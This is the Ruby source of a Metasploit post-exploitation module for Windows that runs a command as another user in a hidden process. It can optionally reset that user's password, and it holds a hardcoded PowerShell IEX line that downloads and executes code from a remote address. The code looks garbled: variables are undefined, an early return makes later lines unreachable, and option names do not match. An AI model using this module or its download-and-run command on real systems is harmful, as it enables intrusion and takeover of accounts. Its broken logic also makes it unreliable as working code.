## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::Powershell include Msf::Post::Windows::Runas def initialize(info={}) super(update_info(info, 'Name' => "Windows Manage Run Command As User", 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to display.By setting advanced option SETPASS to true, it will reset the users password and then execute the command. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499'], 'Targets' => [ [ 'Universal', {} ] ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('DOMAIN', [true, 'Domain to login with' ]), OptString.new('USER', [true, 'Username to login with' ]), OptString.new('PASSWORD', [true, 'Password to login with' ]), OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)']), OptString.new('COMMAND_LINE', [true, 'Command line to execute (lpCommandLine)']), ], self.class) register_advanced_options( [ OptBool.new('CMDOUT', [true, 'Retrieve command output', false]), OptBool.new('SETPASS', [true, 'Reset password', false]) ], self.class) end # Check if sufficient privileges are present for certain actions and run getprivs for system # If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You # need to migrate to a process that is running as # system. If you don't have privs, this exits script. def priv_check if is_system? privs = session.sys.config.getprivs if privs.include?("SeAssignPrimaryTokenPrivilege") and privs.include?("SeIncreaseQuotaPrivilege") @isadmin = false return true else return false end elsif is_admin? @isadmin = true return true else return false end end def reset_pass(user, password) cmd = "cmd.exe /c net user #{user} #{password}" r = cmd_exec(cmd) return r.include?("successfully") end def exploit fail_with(Exploit::Failure::BadConfig, "Must be a meterpreter session") if session.sys.config.sysinfo.type != "meterpreter" # check/set vars cmdout = datastore["CMDOUT"] user = datastore["USER"] password = datastore["PASS"] application_name = datastore['APPLICATION_NAME'] command_line = datastore["COMMAND_LINE"] domain = datastore['DOMAIN'] cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) cmdstr = 'powershell.exe -C IEX ((new-object net.webclient).downloadstring(\'http://192.168.5.101:8080/x86\'))' if is_system? puts create_process_as_user(domain, user, password, application_name, command_line) else puts create_process_with_logon(domain, user, password, application_name, command_line) #print_error("Insufficient Privileges, either you are not Admin or system or you elevated") #print_error("privs to system and do not have sufficient privileges. If you elevated to") #print_error("system, migrate to a process that was started as system (srvhost.exe)") #return 0 end return # Only process file if the process creation was successful, delete when done, give us info # about process if cs["return"] tmpout = "" if cmdout outfile = session.fs.file.new(outpath, "rb") until outfile.eof? tmpout << outfile.read end outfile.close c = session.sys.process.execute("cmd.exe /c del #{outpath}", nil, {'Hidden' => true}) c.close end pi = cs["lpProcessInformation"].unpack("LLLL") print_status("Command Run: #{cmdstr}") print_status("Process Handle: #{pi[0]}") print_status("Thread Handle: #{pi[1]}") print_status("Process Id: #{pi[2]}") print_status("Thread Id: #{pi[3]}") print_line(tmpout) else print_error("#{cs["ErrorMessage"]}") return 0 end end end